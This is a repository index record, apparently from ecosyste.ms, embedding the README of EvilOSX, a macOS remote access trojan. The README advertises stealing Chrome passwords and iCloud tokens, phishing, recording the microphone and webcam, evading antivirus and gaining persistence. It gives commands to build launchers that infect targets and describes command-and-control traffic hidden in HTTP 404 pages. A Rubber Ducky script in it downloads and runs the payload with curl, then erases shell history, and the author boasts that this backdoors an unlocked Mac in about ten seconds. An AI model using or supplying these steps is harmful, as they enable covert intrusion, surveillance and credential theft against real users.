{"id":13454393,"url":"https://github.com/Marten4n6/EvilOSX","last_synced_at":"2025-03-24T05:33:42.386Z","repository":{"id":45522529,"uuid":"121546909","full_name":"Marten4n6/EvilOSX","owner":"Marten4n6","description":"An evil RAT (Remote Administration Tool) for macOS / OS X.","archived":false,"fork":false,"pushed_at":"2021-02-10T15:02:53.000Z","size":788,"stargazers_count":2314,"open_issues_count":45,"forks_count":486,"subscribers_count":109,"default_branch":"master","last_synced_at":"2025-03-17T11:02:54.925Z","etag":null,"topics":["backdoor","mac","macos","macosx","osx","pentesting","post-exploitation","python","python3","rat","reverse-shell"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Marten4n6.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE.txt","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2018-02-14T18:38:55.000Z","updated_at":"2025-03-16T08:23:34.000Z","dependencies_parsed_at":"2022-07-16T01:47:55.936Z","dependency_job_id":null,"html_url":"https://github.com/Marten4n6/EvilOSX","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Marten4n6%2FEvilOSX","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Marten4n6%2FEvilOSX/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Marten4n6%2FEvilOSX/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Marten4n6%2FEvilOSX/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Marten4n6","download_url":"https://codeload.github.com/Marten4n6/EvilOSX/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":245217427,"owners_count":20579291,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["backdoor","mac","macos","macosx","osx","pentesting","post-exploitation","python","python3","rat","reverse-shell"],"created_at":"2024-07-31T08:00:53.684Z","updated_at":"2025-03-24T05:33:41.825Z","avatar_url":"https://github.com/Marten4n6.png","language":"Python","readme":"\u003ch1 align=\"center\"\u003e\n  \u003cbr\u003e\n  \u003ca href=\"https://github.com/Marten4n6/EvilOSX\"\u003e\u003cimg src=\"/data/images/logo.png?raw=true\" alt=\"Logo\" width=\"280\"\u003e\u003c/a\u003e\n  \u003cbr\u003e\n  EvilOSX\n  \u003cbr\u003e\n\u003c/h1\u003e\n\n\u003ch4 align=\"center\"\u003eAn evil RAT (Remote Administration Tool) for macOS / OS X.\u003c/h4\u003e\n\n\u003cp align=\"center\"\u003e\n  \u003ca href=\"https://github.com/Marten4n6/EvilOSX/blob/master/LICENSE.txt\"\u003e\n      \u003cimg src=\"https://img.shields.io/badge/license-GPLv3-blue.svg?style=flat-square\" alt=\"License\"\u003e\n  \u003c/a\u003e\n  \u003ca href=\"https://github.com/Marten4n6/EvilOSX/blob/master/LICENSE.txt\"\u003e\n      \u003cimg src=\"https://img.shields.io/badge/python-2.7,%203.7-blue.svg?style=flat-square\" alt=\"Python\"\u003e\n  \u003c/a\u003e\n  \u003ca href=\"https://github.com/Marten4n6/EvilOSX/issues\"\u003e\n    \u003cimg src=\"https://img.shields.io/github/issues/Marten4n6/EvilOSX.svg?style=flat-square\" alt=\"Issues\"\u003e\n  \u003c/a\u003e\n  \u003ca href=\"https://travis-ci.org/Marten4n6/EvilOSX\"\u003e\n      \u003cimg src=\"https://img.shields.io/travis/Marten4n6/EvilOSX/master.svg?style=flat-square\" alt=\"Build Status\"\u003e\n  \u003c/a\u003e\n  \u003ca href=\"https://github.com/Marten4n6/EvilOSX/blob/master/CONTRIBUTING.md\"\u003e\n      \u003cimg src=\"https://img.shields.io/badge/contributions-welcome-brightgreen.svg?style=flat-square\" alt=\"Contributing\"\u003e\n  \u003c/a\u003e\n\u003c/p\u003e\n\n---\n\n[Marco Generator](https://github.com/cedowens/EvilOSX_MacroGenerator) by Cedric Owens\n\n### This project is no longer active\n\n## Features\n- Emulate a terminal instance\n- Simple extendable [module](https://github.com/Marten4n6/EvilOSX/blob/master/CONTRIBUTING.md) system\n- No bot dependencies (pure python)\n- Undetected by anti-virus (OpenSSL [AES-256](https://en.wikipedia.org/wiki/Advanced_Encryption_Standard) encrypted payloads)\n- Persistent\n- GUI and CLI support\n- Retrieve Chrome passwords\n- Retrieve iCloud tokens and contacts\n- Retrieve/monitor the clipboard\n- Retrieve browser history (Chrome and Safari)\n- [Phish](https://i.imgur.com/x3ilHQi.png) for iCloud passwords via iTunes\n- iTunes (iOS) backup enumeration\n- Record the microphone\n- Take a desktop screenshot or picture using the webcam\n- Attempt to get root via local privilege escalation\n\n## How To Use\n\n```bash\n# Clone or download this repository\n$ git clone https://github.com/Marten4n6/EvilOSX\n\n# Go into the repository\n$ cd EvilOSX\n\n# Install dependencies required by the server\n$ sudo pip install -r requirements.txt\n\n# Start the GUI\n$ python start.py\n\n# Lastly, run a built launcher on your target(s)\n```\n\n**Warning:** Because payloads are created unique to the target system (automatically by the server), the server must be running when any bot connects for the first time.\n\n### Advanced users\n\nThere's also a CLI for those who want to use this over SSH:\n```bash\n# Create a launcher to infect your target(s)\n$ python start.py --builder\n\n# Start the CLI\n$ python start.py --cli --port 1337\n\n# Lastly, run a built launcher on your target(s)\n```\n\n## Screenshots\n\n![CLI](https://i.imgur.com/DGYCQMl.png)\n![GUI](https://i.imgur.com/qw3k4z4.png)\n\n## Motivation\nThis project was created to be used with my [Rubber Ducky](https://hakshop.com/products/usb-rubber-ducky-deluxe), here's the simple script:\n```\nREM Download and execute EvilOSX @ https://github.com/Marten4n6/EvilOSX\nREM See also: https://ducktoolkit.com/vidpid/\n\nDELAY 1000\nGUI SPACE\nDELAY 500\nSTRING Termina\nDELAY 1000\nENTER\nDELAY 1500\n\nREM Kill all terminals after x seconds\nSTRING screen -dm bash -c 'sleep 6; killall Terminal'\nENTER\n\nSTRING cd /tmp; curl -s HOST_TO_EVILOSX.py -o 1337.py; python 1337.py; history -cw; clear\nENTER\n```\n- It takes about 10 seconds to backdoor any unlocked Mac, which is...... *nice*\n- Termina**l** is spelt that way intentionally, on some systems spotlight won't find the terminal otherwise. \u003cbr/\u003e\n- To bypass the keyboard setup assistant make sure you change the VID\u0026PID which can be found [here](https://ducktoolkit.com/vidpid/). \u003cbr/\u003e\n  Aluminum Keyboard (ISO) is probably the one you are looking for.\n\n\n## Versioning\nEvilOSX will be maintained under the Semantic Versioning guidelines as much as possible. \u003cbr/\u003e\nServer and bot releases will be numbered with the follow format:\n```\n\u003cmajor\u003e.\u003cminor\u003e.\u003cpatch\u003e\n```\n\nAnd constructed with the following guidelines:\n- Breaking backward compatibility (with older bots) bumps the major\n- New additions without breaking backward compatibility bumps the minor\n- Bug fixes and misc changes bump the patch\n\nFor more information on SemVer, please visit https://semver.org/.\n\n## Design Notes\n- Infecting a machine is split up into three parts:\n  * A **launcher** is run on the target machine whose only goal is to run the stager\n  * The stager asks the server for a **loader** which handles how a payload will be loaded\n  * The loader is given a uniquely encrypted **payload** and then sent back to the stager\n- The server hides it's communications by sending messages hidden in HTTP 404 error pages (from BlackHat's \"Hiding In Plain Sight\")\n  * Command requests are retrieved from the server via a GET request\n  * Command responses are sent to the server via a POST request\n- Modules take advantage of python's dynamic nature, they are simply sent over the network compressed with [zlib](https://www.zlib.net), along with any configuration options\n- Since the bot only communicates with the server and never the other way around, the server has no way of knowing when a bot goes offline\n\n## Issues\nFeel free to submit any issues or feature requests [here](https://github.com/Marten4n6/EvilOSX/issues).\n\n## Contributing\nFor a simple guide on how to create modules click [here](https://github.com/Marten4n6/EvilOSX/blob/master/CONTRIBUTING.md).\n\n## Credits\n- The awesome [Empire](https://github.com/EmpireProject) project\n- Shoutout to [Patrick Wardle](https://twitter.com/patrickwardle) for his awesome talks, check out [Objective-See](https://objective-see.com/)\n- manwhoami for his projects: OSXChromeDecrypt, MMeTokenDecrypt, iCloudContacts \u003cbr/\u003e\n  (now deleted... let me know if you reappear)\n- The slowloris module is pretty much copied from [PySlowLoris](https://github.com/ProjectMayhem/PySlowLoris)\n- [urwid](http://urwid.org/) and [this code](https://github.com/izderadicka/xmpp-tester/blob/master/commander.py) which saved me a lot of time with the CLI\n- Logo created by [motusora](https://www.behance.net/motusora)\n\n## License\n[GPLv3](https://github.com/Marten4n6/EvilOSX/blob/master/LICENSE.txt)\n","funding_links":[],"categories":["macOS Utilities","Uncategorized","Python","Python (1887)","backdoor","Tools","Operating Systems"],"sub_categories":["Intentionally Vulnerable Systems as Docker Containers","Uncategorized","macOS Utilities","macOS","Penetration Testing Report Templates","Open Source"],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FMarten4n6%2FEvilOSX","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FMarten4n6%2FEvilOSX","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FMarten4n6%2FEvilOSX/lists"}